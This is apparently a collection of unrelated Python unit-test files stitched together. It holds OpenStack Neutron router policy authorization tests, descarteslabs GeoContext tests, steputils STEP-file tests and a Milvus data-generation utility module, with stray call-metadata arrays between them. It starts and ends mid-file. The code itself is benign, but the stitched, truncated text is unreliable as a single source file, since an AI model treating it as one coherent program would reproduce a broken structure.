def test_update_router_external_gateway_info_network_id(self):
self.assertTrue(
policy.enforce(self.context,
'update_router:external_gateway_info:network_id',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.alt_target)
def test_update_router_external_gateway_info_enable_snat(self):
self.assertTrue(
policy.enforce(self.context,
'update_router:external_gateway_info:enable_snat',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.alt_target)
def test_update_router_external_gateway_info_external_fixed_ips(self):
self.assertTrue(
policy.enforce(
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_delete_router(self):
self.assertTrue(
policy.enforce(self.context, 'delete_router', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'delete_router', self.alt_target)
def test_add_router_interface(self):
self.assertTrue(
policy.enforce(self.context,
'add_router_interface', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_router_interface', self.alt_target)
def test_remove_router_interface(self):
self.assertTrue(
policy.enforce(self.context,
'remove_router_interface', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_router_interface', self.alt_target)
class ProjectMemberTests(ProjectAdminTests):
def setUp(self):
super(ProjectMemberTests, self).setUp()
self.context = self.project_member_ctx
def test_create_router_distributed(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:distributed', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:distributed', self.alt_target)
def test_create_router_ha(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:ha', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:ha', self.alt_target)
def test_create_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:enable_snat',
self.alt_target)
def test_create_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'create_router:external_gateway_info:external_fixed_ips',
self.alt_target)
def test_get_router_distributed(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:distributed', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:distributed', self.alt_target)
def test_get_router_ha(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:ha', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'get_router:ha', self.alt_target)
def test_update_router_distributed(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:distributed', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:distributed', self.alt_target)
def test_update_router_ha(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:ha', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:ha', self.alt_target)
def test_update_router_external_gateway_info_enable_snat(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:enable_snat',
self.alt_target)
def test_update_router_external_gateway_info_external_fixed_ips(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context,
'update_router:external_gateway_info:external_fixed_ips',
self.alt_target)
class ProjectReaderTests(ProjectMemberTests):
def setUp(self):
super(ProjectMemberTests, self).setUp()
self.context = self.project_reader_ctx
def test_create_router(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router', self.alt_target)
def test_create_router_external_gateway_info(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info',
self.alt_target)
def test_create_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'create_router:external_gateway_info:network_id',
self.alt_target)
def test_update_router(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router', self.alt_target)
def test_update_router_external_gateway_info(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info',
self.alt_target)
def test_update_router_external_gateway_info_network_id(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'update_router:external_gateway_info:network_id',
self.alt_target)
def test_delete_router(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'delete_router', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'delete_router', self.alt_target)
def test_add_router_interface(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_router_interface', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_router_interface', self.alt_target)
def test_remove_router_interface(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_router_interface', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_router_interface', self.alt_target)
class ExtrarouteAPITestCase(base.PolicyBaseTestCase):
def setUp(self):
super(ExtrarouteAPITestCase, self).setUp()
self.router = {
'id': uuidutils.generate_uuid(),
'project_id': self.project_id}
self.target = {
'project_id': self.project_id,
'router_id': self.router['id'],
'ext_parent_router_id': self.router['id']}
self.alt_target = {
'project_id': self.alt_project_id,
'router_id': self.router['id'],
'ext_parent_router_id': self.router['id']}
class SystemAdminExtrarouteTests(ExtrarouteAPITestCase):
def setUp(self):
super(SystemAdminExtrarouteTests, self).setUp()
self.context = self.system_admin_ctx
def test_add_extraroute(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_extraroutes', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'add_extraroutes', self.alt_target)
def test_remove_extraroute(self):
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_extraroutes', self.target)
self.assertRaises(
base_policy.InvalidScope,
policy.enforce,
self.context, 'remove_extraroutes', self.alt_target)
class SystemMemberExtrarouteTests(SystemAdminExtrarouteTests):
def setUp(self):
super(SystemMemberExtrarouteTests, self).setUp()
self.context = self.system_member_ctx
class SystemReaderExtrarouteTests(SystemMemberExtrarouteTests):
def setUp(self):
super(SystemReaderExtrarouteTests, self).setUp()
self.context = self.system_reader_ctx
class ProjectAdminExtrarouteTests(ExtrarouteAPITestCase):
def setUp(self):
super(ProjectAdminExtrarouteTests, self).setUp()
self.context = self.project_admin_ctx
def test_add_extraroute(self):
self.assertTrue(
policy.enforce(self.context, 'add_extraroutes', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_extraroutes', self.alt_target)
def test_remove_extraroute(self):
self.assertTrue(
policy.enforce(self.context, 'remove_extraroutes', self.target))
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_extraroutes', self.alt_target)
class ProjectMemberExtrarouteTests(ProjectAdminExtrarouteTests):
def setUp(self):
super(ProjectMemberExtrarouteTests, self).setUp()
self.context = self.project_member_ctx
class ProjectReaderExtrarouteTests(ProjectMemberExtrarouteTests):
def setUp(self):
super(ProjectReaderExtrarouteTests, self).setUp()
self.context = self.project_reader_ctx
def test_add_extraroute(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_extraroutes', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'add_extraroutes', self.alt_target)
def test_remove_extraroute(self):
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_extraroutes', self.target)
self.assertRaises(
base_policy.PolicyNotAuthorized,
policy.enforce,
self.context, 'remove_extraroutes', self.alt_target)
|
[
"oslo_utils.uuidutils.generate_uuid",
"neutron.policy.enforce"
] |
[((9620, 9678), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router"""', 'self.target'], {}), "(self.context, 'create_router', self.target)\n", (9634, 9678), False, 'from neutron import policy\n'), ((9924, 9994), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:distributed"""', 'self.target'], {}), "(self.context, 'create_router:distributed', self.target)\n", (9938, 9994), False, 'from neutron import policy\n'), ((10260, 10321), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:ha"""', 'self.target'], {}), "(self.context, 'create_router:ha', self.target)\n", (10274, 10321), False, 'from neutron import policy\n'), ((10580, 10665), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info"""', 'self.target'], {}), "(self.context, 'create_router:external_gateway_info', self.target\n )\n", (10594, 10665), False, 'from neutron import policy\n'), ((11015, 11110), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info:network_id"""', 'self.target'], {}), "(self.context,\n 'create_router:external_gateway_info:network_id', self.target)\n", (11029, 11110), False, 'from neutron import policy\n'), ((11473, 11569), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info:enable_snat"""', 'self.target'], {}), "(self.context,\n 'create_router:external_gateway_info:enable_snat', self.target)\n", (11487, 11569), False, 'from neutron import policy\n'), ((11940, 12043), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""create_router:external_gateway_info:external_fixed_ips"""', 'self.target'], {}), "(self.context,\n 'create_router:external_gateway_info:external_fixed_ips', self.target)\n", (11954, 12043), False, 'from neutron import policy\n'), ((12384, 12439), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""get_router"""', 'self.target'], {}), "(self.context, 'get_router', self.target)\n", (12398, 12439), False, 'from neutron import policy\n'), ((12679, 12746), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""get_router:distributed"""', 'self.target'], {}), "(self.context, 'get_router:distributed', self.target)\n", (12693, 12746), False, 'from neutron import policy\n'), ((13006, 13064), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""get_router:ha"""', 'self.target'], {}), "(self.context, 'get_router:ha', self.target)\n", (13020, 13064), False, 'from neutron import policy\n'), ((13298, 13356), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router"""', 'self.target'], {}), "(self.context, 'update_router', self.target)\n", (13312, 13356), False, 'from neutron import policy\n'), ((13602, 13672), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:distributed"""', 'self.target'], {}), "(self.context, 'update_router:distributed', self.target)\n", (13616, 13672), False, 'from neutron import policy\n'), ((13938, 13999), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:ha"""', 'self.target'], {}), "(self.context, 'update_router:ha', self.target)\n", (13952, 13999), False, 'from neutron import policy\n'), ((14258, 14343), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info"""', 'self.target'], {}), "(self.context, 'update_router:external_gateway_info', self.target\n )\n", (14272, 14343), False, 'from neutron import policy\n'), ((14693, 14788), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info:network_id"""', 'self.target'], {}), "(self.context,\n 'update_router:external_gateway_info:network_id', self.target)\n", (14707, 14788), False, 'from neutron import policy\n'), ((15151, 15247), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info:enable_snat"""', 'self.target'], {}), "(self.context,\n 'update_router:external_gateway_info:enable_snat', self.target)\n", (15165, 15247), False, 'from neutron import policy\n'), ((15618, 15721), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""update_router:external_gateway_info:external_fixed_ips"""', 'self.target'], {}), "(self.context,\n 'update_router:external_gateway_info:external_fixed_ips', self.target)\n", (15632, 15721), False, 'from neutron import policy\n'), ((16065, 16123), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""delete_router"""', 'self.target'], {}), "(self.context, 'delete_router', self.target)\n", (16079, 16123), False, 'from neutron import policy\n'), ((16364, 16429), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""add_router_interface"""', 'self.target'], {}), "(self.context, 'add_router_interface', self.target)\n", (16378, 16429), False, 'from neutron import policy\n'), ((16707, 16775), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""remove_router_interface"""', 'self.target'], {}), "(self.context, 'remove_router_interface', self.target)\n", (16721, 16775), False, 'from neutron import policy\n'), ((25331, 25356), 'oslo_utils.uuidutils.generate_uuid', 'uuidutils.generate_uuid', ([], {}), '()\n', (25354, 25356), False, 'from oslo_utils import uuidutils\n'), ((27256, 27316), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""add_extraroutes"""', 'self.target'], {}), "(self.context, 'add_extraroutes', self.target)\n", (27270, 27316), False, 'from neutron import policy\n'), ((27559, 27622), 'neutron.policy.enforce', 'policy.enforce', (['self.context', '"""remove_extraroutes"""', 'self.target'], {}), "(self.context, 'remove_extraroutes', self.target)\n", (27573, 27622), False, 'from neutron import policy\n')]
|
import pytest
import shapely.geometry
from descarteslabs import scenes
from .. import GeoContext
from descarteslabs.workflows.types.containers import Tuple
from descarteslabs.workflows.types.primitives import Int, Float
def test_from_scenes_wrong_type():
with pytest.raises(
TypeError, match=r"expected a `descarteslabs\.scenes\.GeoContext`"
):
GeoContext.from_scenes("foo")
def test_from_scenes_aoi():
aoi = scenes.AOI(
geometry=shapely.geometry.box(-60.0, 30.0, -50.0, 40.0),
resolution=1,
crs="EPSG:4326",
align_pixels=False,
)
ctx = GeoContext.from_scenes(aoi)
assert ctx.graft[ctx.graft["returns"]][0] == "wf.GeoContext.create"
promoted = GeoContext._promote(aoi)
assert promoted.graft[promoted.graft["returns"]][0] == "wf.GeoContext.create"
def test_from_scenes_tile():
tile_dict = {
"geometry": {
"coordinates": [
[
[-100.10534464886125, 59.94175277369993],
[-99.91065247366876, 59.943240309707676],
[-99.91334037259435, 60.040922421458546],
[-100.10860694364838, 60.039429047992876],
[-100.10534464886125, 59.94175277369993],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32614",
"geotrans": [438240.0, 20.0, 0, 6656320.0, 0, -20.0],
"key": "512:16:20.0:14:-6:649",
"outputBounds": [438240.0, 6645440.0, 449120.0, 6656320.0],
"pad": 16,
"proj4": "+proj=utm +zone=14 +datum=WGS84 +units=m +no_defs ",
"resolution": 20.0,
"ti": -6,
"tilesize": 512,
"tj": 649,
"zone": 14,
},
"type": "Feature",
}
tile = scenes.DLTile(tile_dict)
ctx = GeoContext.from_scenes(tile)
assert ctx.graft[ctx.graft["returns"]][0] == "wf.GeoContext.from_dltile_key"
promoted = GeoContext._promote(tile)
assert (
promoted.graft[promoted.graft["returns"]][0] == "wf.GeoContext.from_dltile_key"
)
def test_from_scenes_xyztile():
tile = scenes.XYZTile(3, 5, 4)
ctx = GeoContext.from_scenes(tile)
assert ctx.graft[ctx.graft["returns"]][0] == "wf.GeoContext.from_xyz_tile"
promoted = GeoContext._promote(tile)
assert promoted.graft[promoted.graft["returns"]][0] == "wf.GeoContext.from_xyz_tile"
def test_promote_dltile_from_key():
ctx = GeoContext.from_dltile_key("500:0:10.0:13:-17:790")
assert GeoContext._promote(ctx) is ctx
def test_promote_xyztile_from_xyz():
ctx = GeoContext.from_xyz_tile(3, 5, 4)
assert GeoContext._promote(ctx) is ctx
@pytest.mark.parametrize("attr", ["arr_shape", "gdal_geotrans", "projected_bounds"])
def test_readonly_attributes(attr):
type_params = GeoContext._type_params[0]
ctx = GeoContext.from_xyz_tile(3, 5, 4)
assert isinstance(getattr(ctx, attr), type_params[attr])
def test_index_to_coords():
aoi = scenes.AOI(
geometry=shapely.geometry.box(-60.0, 30.0, -50.0, 40.0),
resolution=1,
crs="EPSG:4326",
align_pixels=False,
)
ctx = GeoContext.from_scenes(aoi)
coords = ctx.index_to_coords(0, 0)
assert isinstance(coords, Tuple[Float, Float])
def test_coords_to_index():
aoi = scenes.AOI(
geometry=shapely.geometry.box(-60.0, 30.0, -50.0, 40.0),
resolution=1,
crs="EPSG:4326",
align_pixels=False,
)
ctx = GeoContext.from_scenes(aoi)
ctx = GeoContext._promote(ctx)
index = ctx.coords_to_index(0.0, 1.0)
assert isinstance(index, Tuple[Int, Int])
|
[
"pytest.raises",
"pytest.mark.parametrize",
"descarteslabs.scenes.DLTile",
"descarteslabs.scenes.XYZTile"
] |
[((2748, 2835), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""attr"""', "['arr_shape', 'gdal_geotrans', 'projected_bounds']"], {}), "('attr', ['arr_shape', 'gdal_geotrans',\n 'projected_bounds'])\n", (2771, 2835), False, 'import pytest\n'), ((1864, 1888), 'descarteslabs.scenes.DLTile', 'scenes.DLTile', (['tile_dict'], {}), '(tile_dict)\n', (1877, 1888), False, 'from descarteslabs import scenes\n'), ((2203, 2226), 'descarteslabs.scenes.XYZTile', 'scenes.XYZTile', (['(3)', '(5)', '(4)'], {}), '(3, 5, 4)\n', (2217, 2226), False, 'from descarteslabs import scenes\n'), ((267, 354), 'pytest.raises', 'pytest.raises', (['TypeError'], {'match': '"""expected a `descarteslabs\\\\.scenes\\\\.GeoContext`"""'}), "(TypeError, match=\n 'expected a `descarteslabs\\\\.scenes\\\\.GeoContext`')\n", (280, 354), False, 'import pytest\n')]
|
# Created: 28.12.2019
# Copyright (c) 2019 <NAME>
# License: MIT License
import pytest
from io import StringIO
from steputils import p21
@pytest.fixture
def stpfile():
stp = p21.new_step_file()
timestamp = p21.timestamp()
stp.header.set_file_description(('notes1', 'notes2'))
stp.header.set_file_name('test.stp', timestamp)
section = stp.new_data_section()
section.add(p21.simple_entity_instance('#100', p21.entity('TEST', (1, 2, 3))))
section.add(p21.simple_entity_instance('#1', p21.entity('TEST', (3, 2, 1))))
stp.new_data_section(name='SEC1', schema='IFC2X3')
return stp
def test_has_reference(stpfile):
assert stpfile.has_reference('#100') is True
assert stpfile.has_reference('#1') is True
assert stpfile.has_reference('#2') is False
def test_new_named_data_section():
stp = p21.new_step_file()
stp.new_data_section()
assert len(stp.data) == 1
stp.new_data_section('WithName', 'Schema')
assert len(stp.data) == 2
with pytest.raises(ValueError):
# A named data section requires a file schema
stp.new_data_section('WithName')
def test_iter_protocol(stpfile):
result = list(stpfile)
assert len(result) == 2
assert p21.is_simple_entity_instance(result[0])
def test_step_file_getter(stpfile):
assert stpfile['#100'].ref == '#100'
assert stpfile['#1'].ref == '#1'
def test_step_file_delete_entity_instance_by_ref(stpfile):
assert stpfile['#100'].ref == '#100'
del stpfile['#100']
with pytest.raises(KeyError):
stpfile['#100']
def test_len(stpfile):
assert len(stpfile) == 2
def test_header(stpfile):
stpfile._set_schemas()
timestamp = stpfile.header['FILE_NAME'].params[1]
fp = StringIO()
stpfile.header.write(fp)
result = fp.getvalue().split('\n')
assert result[0] == "HEADER;"
assert result[1] == "FILE_DESCRIPTION(('notes1','notes2'),'2;1');"
assert result[2] == f"FILE_NAME('test.stp','{timestamp}','',(''),(''),'','');"
assert result[3] == "FILE_SCHEMA(('IFC2X3'));"
assert result[4] == "ENDSEC;"
def test_data_section_1(stpfile):
fp = StringIO()
stpfile.data[0].write(fp)
result = fp.getvalue().split('\n')
assert result[0] == 'DATA;'
assert result[1] == "#100=TEST(1,2,3);"
assert result[2] == "#1=TEST(3,2,1);"
assert result[-2] == 'ENDSEC;'
def test_data_section_2(stpfile):
fp = StringIO()
stpfile.data[1].write(fp)
result = fp.getvalue().split('\n')
assert result[0] == "DATA('SEC1',('IFC2X3'));"
assert result[-2] == 'ENDSEC;'
def test_iso_10303_21_marker(stpfile):
result = str(stpfile).split('\n')
assert result[0] == 'ISO-10303-21;'
# StingIO() last '' marks ends of file
assert result[-2] == 'END-ISO-10303-21;'
def test_creation_of_file_schema_entry(stpfile):
assert 'FILE_SCHEMA' not in stpfile.header
# FILE_SCHEMA will be created automatically if not defined by user, but is ('NONE')
# if data sections have no schema attribute.
stpfile._set_schemas()
entry = stpfile.header['FILE_SCHEMA']
assert entry.params[0] == ('IFC2X3',)
if __name__ == '__main__':
pytest.main([__file__])
|
[
"steputils.p21.timestamp",
"io.StringIO",
"pytest.main",
"pytest.raises",
"steputils.p21.new_step_file",
"steputils.p21.is_simple_entity_instance",
"steputils.p21.entity"
] |
[((181, 200), 'steputils.p21.new_step_file', 'p21.new_step_file', ([], {}), '()\n', (198, 200), False, 'from steputils import p21\n'), ((217, 232), 'steputils.p21.timestamp', 'p21.timestamp', ([], {}), '()\n', (230, 232), False, 'from steputils import p21\n'), ((840, 859), 'steputils.p21.new_step_file', 'p21.new_step_file', ([], {}), '()\n', (857, 859), False, 'from steputils import p21\n'), ((1226, 1266), 'steputils.p21.is_simple_entity_instance', 'p21.is_simple_entity_instance', (['result[0]'], {}), '(result[0])\n', (1255, 1266), False, 'from steputils import p21\n'), ((1739, 1749), 'io.StringIO', 'StringIO', ([], {}), '()\n', (1747, 1749), False, 'from io import StringIO\n'), ((2136, 2146), 'io.StringIO', 'StringIO', ([], {}), '()\n', (2144, 2146), False, 'from io import StringIO\n'), ((2414, 2424), 'io.StringIO', 'StringIO', ([], {}), '()\n', (2422, 2424), False, 'from io import StringIO\n'), ((3166, 3189), 'pytest.main', 'pytest.main', (['[__file__]'], {}), '([__file__])\n', (3177, 3189), False, 'import pytest\n'), ((1003, 1028), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1016, 1028), False, 'import pytest\n'), ((1518, 1541), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (1531, 1541), False, 'import pytest\n'), ((431, 460), 'steputils.p21.entity', 'p21.entity', (['"""TEST"""', '(1, 2, 3)'], {}), "('TEST', (1, 2, 3))\n", (441, 460), False, 'from steputils import p21\n'), ((512, 541), 'steputils.p21.entity', 'p21.entity', (['"""TEST"""', '(3, 2, 1)'], {}), "('TEST', (3, 2, 1))\n", (522, 541), False, 'from steputils import p21\n')]
|
import os
import random
import string
import numpy as np
import pandas as pd
from sklearn import preprocessing
from pymilvus_orm.types import DataType
from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper
from common import common_type as ct
from utils.util_log import test_log as log
import threading
import traceback
"""" Methods of processing data """
l2 = lambda x, y: np.linalg.norm(np.array(x) - np.array(y))
def gen_unique_str(str_value=None):
prefix = "".join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
return "test_" + prefix if str_value is None else str_value + "_" + prefix
def gen_str_by_length(length=8):
return "".join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
def gen_int64_field(name=ct.default_int64_field_name, description=ct.default_desc, is_primary=False, **kwargs):
int64_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.INT64, description=description,
is_primary=is_primary, **kwargs)
return int64_field
def gen_float_field(name=ct.default_float_field_name, is_primary=False, description=ct.default_desc):
float_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.FLOAT, description=description,
is_primary=is_primary)
return float_field
def gen_float_vec_field(name=ct.default_float_vec_field_name, is_primary=False, dim=ct.default_dim,
description=ct.default_desc):
float_vec_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.FLOAT_VECTOR,
description=description, dim=dim,
is_primary=is_primary)
return float_vec_field
def gen_binary_vec_field(name=ct.default_binary_vec_field_name, is_primary=False, dim=ct.default_dim,
description=ct.default_desc):
binary_vec_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.BINARY_VECTOR,
description=description, dim=dim,
is_primary=is_primary)
return binary_vec_field
def gen_default_collection_schema(description=ct.default_desc, primary_field=ct.default_int64_field_name, auto_id=False):
fields = [gen_int64_field(), gen_float_field(), gen_float_vec_field()]
schema, _ = ApiCollectionSchemaWrapper().init_collection_schema(fields=fields, description=description,
primary_field=primary_field, auto_id=auto_id)
return schema
def gen_collection_schema(fields, primary_field=None, description=ct.default_desc, auto_id=False):
schema, _ = ApiCollectionSchemaWrapper().init_collection_schema(fields=fields, primary_field=primary_field,
description=description, auto_id=auto_id)
return schema
def gen_default_binary_collection_schema(description=ct.default_desc, primary_field=ct.default_int64_field_name):
fields = [gen_int64_field(), gen_float_field(), gen_binary_vec_field()]
binary_schema, _ = ApiCollectionSchemaWrapper().init_collection_schema(fields=fields, description=description,
primary_field=primary_field)
return binary_schema
def gen_vectors(nb, dim):
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors = preprocessing.normalize(vectors, axis=1, norm='l2')
return vectors.tolist()
def gen_binary_vectors(num, dim):
raw_vectors = []
binary_vectors = []
for _ in range(num):
raw_vector = [random.randint(0, 1) for _ in range(dim)]
raw_vectors.append(raw_vector)
binary_vectors.append(bytes(np.packbits(raw_vector, axis=-1).tolist()))
return raw_vectors, binary_vectors
def gen_default_dataframe_data(nb=ct.default_nb, dim=ct.default_dim, start=0):
int_values = pd.Series(data=[i for i in range(start, start + nb)])
float_values = pd.Series(data=[float(i) for i in range(start, start + nb)], dtype="float32")
float_vec_values = gen_vectors(nb, dim)
df = pd.DataFrame({
ct.default_int64_field_name: int_values,
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values
})
return df
def gen_default_binary_dataframe_data(nb=ct.default_nb, dim=ct.default_dim, start=0):
int_values = pd.Series(data=[i for i in range(start, start + nb)])
float_values = pd.Series(data=[float(i) for i in range(start, start + nb)], dtype="float32")
binary_raw_values, binary_vec_values = gen_binary_vectors(nb, dim)
df = pd.DataFrame({
ct.default_int64_field_name: int_values,
ct.default_float_field_name: float_values,
ct.default_binary_vec_field_name: binary_vec_values
})
return df, binary_raw_values
def gen_default_list_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = gen_vectors(nb, dim)
data = [int_values, float_values, float_vec_values]
return data
def gen_default_tuple_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = [i for i in range(nb)]
float_values = [float(i) for i in range(nb)]
float_vec_values = gen_vectors(nb, dim)
data = (int_values, float_values, float_vec_values)
return data
def gen_numpy_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = np.arange(nb, dtype='int64')
float_values = np.arange(nb, dtype='float32')
float_vec_values = gen_vectors(nb, dim)
data = [int_values, float_values, float_vec_values]
return data
def gen_default_binary_list_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
binary_raw_values, binary_vec_values = gen_binary_vectors(nb, dim)
data = [int_values, float_values, binary_vec_values]
return data, binary_raw_values
def gen_simple_index():
index_params = []
for i in range(len(ct.all_index_types)):
if ct.all_index_types[i] in ct.binary_support:
continue
dic = {"index_type": ct.all_index_types[i], "metric_type": "L2"}
dic.update({"params": ct.default_index_params[i]})
index_params.append(dic)
return index_params
def gen_invalid_field_types():
field_types = [
6,
1.0,
[[]],
{},
(),
"",
"a"
]
return field_types
def gen_all_type_fields():
fields = []
for k, v in DataType.__members__.items():
if v != DataType.UNKNOWN:
field, _ = ApiFieldSchemaWrapper().init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
return fields
def gen_normal_expressions():
expressions = [
"",
"int64 > 0",
"(int64 > 0 && int64 < 400) or (int64 > 500 && int64 < 1000)",
"int64 not in [1, 2, 3]",
"int64 in [1, 2, 3] and float != 2",
"int64 == 0 || int64 == 1 || int64 == 2",
]
return expressions
def jaccard(x, y):
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return 1 - np.double(np.bitwise_and(x, y).sum()) / np.double(np.bitwise_or(x, y).sum())
def hamming(x, y):
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return np.bitwise_xor(x, y).sum()
def tanimoto(x, y):
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return -np.log2(np.double(np.bitwise_and(x, y).sum()) / np.double(np.bitwise_or(x, y).sum()))
def substructure(x, y):
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return 1 - np.double(np.bitwise_and(x, y).sum()) / np.count_nonzero(y)
def superstructure(x, y):
x = np.asarray(x, np.bool)
